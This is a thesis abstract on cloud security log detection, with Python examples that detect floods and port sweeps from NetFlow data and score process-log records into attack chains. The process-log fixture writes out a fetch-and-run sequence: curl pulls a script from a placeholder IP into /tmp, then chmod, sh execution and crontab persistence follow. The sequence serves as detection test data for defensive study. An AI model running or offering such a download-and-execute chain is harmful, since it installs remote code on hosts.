Cloud platforms with data-sharing capability greatly improve the efficiency of data transmission, bring considerable convenience to daily life, and strengthen collaborative interaction between industries. With the development and spread of the technology, however, new cyber-security threats also arise. Although traditional cyber-security experience can be applied to cloud security, the current difficulties of managing the cloud environment and of dividing responsibility mean that the cloud environment still faces attacks and threats at the network, host, program and data levels. Log files are complete records of the operation of a device or system, and almost every attack leaves a trace in them. Since "massive traffic volume" is a defining feature of attacks in the cloud environment (almost all DDoS attacks with peak traffic above 300 Gbps originate from the cloud), NetFlow logs are an important reference for detecting network attacks. NetFlow logs, however, can only establish that an attack occurred; they cannot show how the attack progressed. Process logs, as a complete record of the host's internal environment, can measure the impact of the attack. This paper therefore focuses on attack behaviour detection based on NetFlow logs and on attack process analysis based on process logs.

(1) This paper proposes an attack behaviour detection method based on NetFlow logs. Because the large scale of NetFlow logs in the cloud environment makes detection inefficient, and because log structure differs between sources, the paper first compares the contents of four existing NetFlow data sets to find measures that are common to them or easily derived from them. By analysing several common attack flows with these measures, an interaction-frequency calculation method based on the NetFlow quad (four-tuple) is proposed, and a random forest model is used for attack detection. The algorithms have low complexity and high implementation efficiency, and rely only on the most common fields: the quad and the packet and byte counts. On the CICIDS2017 data set the method achieves over 95% accuracy and recall for the vast majority of attacks in the data set, equivalent to the detection effect of the data set's original features, while improving training and detection efficiency; it can therefore detect common attack behaviours.

(2) This paper proposes an attack process analysis method based on process logs. To address the insufficient accuracy of simple machine learning methods, the environment constraints imposed by deep learning frameworks, and the inability of a single log record to reflect a complete attack process, the paper proposes a risk scoring method based on the Analytic Hierarchy Process (AHP) and a data association method based on process derivation (parent-child) relationships. Common attack behaviour characteristics are first classified using MAEC technical documents; a risk score for each process log record is then computed with AHP; finally, records are associated through the process derivation relationship. The method relies only on the most common information: process path, command line and timestamp. Evaluated on real attacks in a cloud environment and on log data collected after simulated attacks, it achieves 83% precision and 97% recall. Compared with a deep learning method, both detection effect and efficiency are improved, so common attack processes can be detected and analysed.

(3) Based on the above algorithms, this paper designs a security log detection system for the cloud environment that detects common attacks and outputs the corresponding logs. The overall framework and implementation details of the system are given, with emphasis on the configuration file module. A result aggregation algorithm is also proposed in the result output module to ease subsequent manual analysis and reduce the pressure on storage space.
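As an added illustration of the NetFlow feature extraction in (1), and not code from the thesis, the following Python buckets constructed NetFlow-style records by quad and time window, derives interaction-frequency features from only the quad, packet and byte fields, and applies fixed threshold rules in place of the random forest classifier. The choice of quad fields (source IP, destination IP, destination port, protocol), the 10-second window, the thresholds and the sample flows are all assumptions made for the example.

```python
"""Interaction-frequency features from NetFlow-style records.

Added example: the quad definition, window size and rule thresholds are
assumptions; the flows below are constructed, not CICIDS2017 data.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # flow start time in seconds
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    packets: int
    bytes: int


def make_sample_flows():
    """Constructed traffic: one single-packet flood, one port sweep, and
    four ordinary HTTP sessions against the same server."""
    flows = []
    for i in range(80):                       # flood: 80 flows in 4 s
        flows.append(Flow(100 + i * 0.05, "10.0.0.5", 40000 + i,
                          "10.0.0.80", 80, "tcp", 1, 60))
    for i in range(30):                       # sweep: 30 distinct ports
        flows.append(Flow(200 + i * 0.2, "10.0.0.6", 51000 + i,
                          "10.0.0.80", 20 + i, "tcp", 1, 60))
    for i in range(4):                        # benign: few flows, many packets
        flows.append(Flow(300 + i * 3.0, "10.0.0.7", 52000 + i,
                          "10.0.0.80", 80, "tcp", 40, 31000))
    return flows


def quad(flow):
    """Assumed quad: source IP, destination IP, destination port, protocol."""
    return (flow.src, flow.dst, flow.dport, flow.proto)


def interaction_features(flows, window=10.0):
    """Per (quad, window) interaction frequency plus mean packets/bytes."""
    buckets = defaultdict(list)
    for f in flows:
        buckets[(quad(f), int(f.ts // window))].append(f)
    feats = {}
    for key, fl in buckets.items():
        n = len(fl)
        feats[key] = {
            "flows": n,
            "mean_packets": sum(f.packets for f in fl) / n,
            "mean_bytes": sum(f.bytes for f in fl) / n,
        }
    return feats


def sweep_features(flows, window=10.0):
    """Distinct destination ports per (src, dst) pair per window."""
    ports = defaultdict(set)
    for f in flows:
        ports[(f.src, f.dst, int(f.ts // window))].add(f.dport)
    return {k: len(v) for k, v in ports.items()}


def classify(flows, window=10.0, flood_min_flows=50,
             flood_max_mean_packets=2, sweep_min_ports=20):
    """Rule-based stand-in for the random forest: label (src, dst) pairs.

    A trained model would consume the same feature dicts; the thresholds
    here are assumptions chosen to separate the constructed sample."""
    labels = {}
    for (q, _w), st in interaction_features(flows, window).items():
        if st["flows"] >= flood_min_flows and st["mean_packets"] <= flood_max_mean_packets:
            labels[(q[0], q[1])] = "flood"
    for (src, dst, _w), nports in sweep_features(flows, window).items():
        if nports >= sweep_min_ports:
            labels[(src, dst)] = "port-sweep"
    return labels


if __name__ == "__main__":
    for pair, label in classify(make_sample_flows()).items():
        print(pair, label)
```

The features are deliberately limited to what every NetFlow variant exports (addresses, ports, protocol, packet and byte counts), which is the portability point made in (1); a production detector would feed the same per-window feature vectors to the trained random forest rather than to fixed thresholds.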
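As an added illustration of the process-log method in (2), and not code from the thesis, the following Python scores constructed process records by matching behaviour categories to the command line and path, then associates records through parent-child (derivation) links so that a single high-scoring process pulls in its whole process tree. The category names, the weights (which stand in for AHP-derived weights), the matching rules and the sample records are assumptions made for the example.

```python
"""Risk scoring plus process-derivation association over process logs.

Added example: categories, weights and rules are assumptions standing in
for the MAEC-based classification and AHP weights described in the text.
"""
import os
from collections import defaultdict

# Constructed records (not collected from any real host): pid, ppid, path, cmdline, ts.
EVENTS = [
    dict(pid=100, ppid=1,   path="/usr/sbin/sshd",   cmdline="/usr/sbin/sshd -D", ts=0),
    dict(pid=200, ppid=100, path="/bin/bash",        cmdline="bash", ts=10),
    dict(pid=201, ppid=200, path="/usr/bin/curl",
         cmdline="curl -s http://198.51.100.7/x.sh -o /tmp/x.sh", ts=12),
    dict(pid=202, ppid=200, path="/bin/chmod",       cmdline="chmod +x /tmp/x.sh", ts=13),
    dict(pid=203, ppid=200, path="/bin/sh",          cmdline="sh /tmp/x.sh", ts=14),
    dict(pid=204, ppid=203, path="/usr/bin/crontab", cmdline="crontab -", ts=15),
    dict(pid=300, ppid=1,   path="/usr/bin/python3", cmdline="python3 /opt/app/server.py", ts=20),
]

# Assumed category weights; in the thesis these come from AHP pairwise comparisons.
WEIGHTS = {"download": 0.15, "make-executable": 0.20,
           "exec-from-tmp": 0.35, "persistence": 0.30}
INTERPRETERS = {"sh", "bash", "python", "python3", "perl"}


def tag_event(ev):
    """Behaviour categories matched by one record, using only path and cmdline."""
    name = os.path.basename(ev["path"])
    argv = ev["cmdline"].split()
    tags = set()
    if name in {"curl", "wget"} and any(a.startswith("http") for a in argv):
        tags.add("download")
    if name == "chmod" and "+x" in argv:
        tags.add("make-executable")
    if name in INTERPRETERS and any(a.startswith(("/tmp/", "/dev/shm/")) for a in argv):
        tags.add("exec-from-tmp")
    if name == "crontab":
        tags.add("persistence")
    return tags


def score_event(ev):
    """Weighted sum of matched categories, rounded to avoid float noise."""
    return round(sum(WEIGHTS[t] for t in tag_event(ev)), 3)


def build_tree(events):
    by_pid = {ev["pid"]: ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev["pid"])
    return by_pid, children


def root_of(pid, by_pid):
    """Follow ppid links to the topmost ancestor present in the log."""
    while by_pid[pid]["ppid"] in by_pid:
        pid = by_pid[pid]["ppid"]
    return pid


def subtree(root, children):
    out, stack = [], [root]
    while stack:
        p = stack.pop()
        out.append(p)
        stack.extend(children.get(p, []))
    return out


def analyze(events, threshold=0.3):
    """Any record at or above threshold pulls in its whole derivation tree,
    ordered by timestamp, so the output shows the attack as a process."""
    by_pid, children = build_tree(events)
    chains = {}
    for ev in events:
        if score_event(ev) < threshold:
            continue
        root = root_of(ev["pid"], by_pid)
        if root in chains:
            continue
        pids = sorted(subtree(root, children), key=lambda p: by_pid[p]["ts"])
        chains[root] = {
            "score": round(sum(score_event(by_pid[p]) for p in pids), 3),
            "pids": pids,
            "tags": {p: sorted(tag_event(by_pid[p])) for p in pids if tag_event(by_pid[p])},
        }
    return chains


if __name__ == "__main__":
    for root, chain in analyze(EVENTS).items():
        print("root", root, "score", chain["score"])
        for p in chain["pids"]:
            print("  ", p, EVENTS[[e["pid"] for e in EVENTS].index(p)]["cmdline"])
```

The association step is what turns isolated alerts into an attack process: the download and chmod records score below the threshold on their own, but because they share a derivation root with the script execution and the crontab write they are reported together, and the unrelated server process under pid 300 is left out.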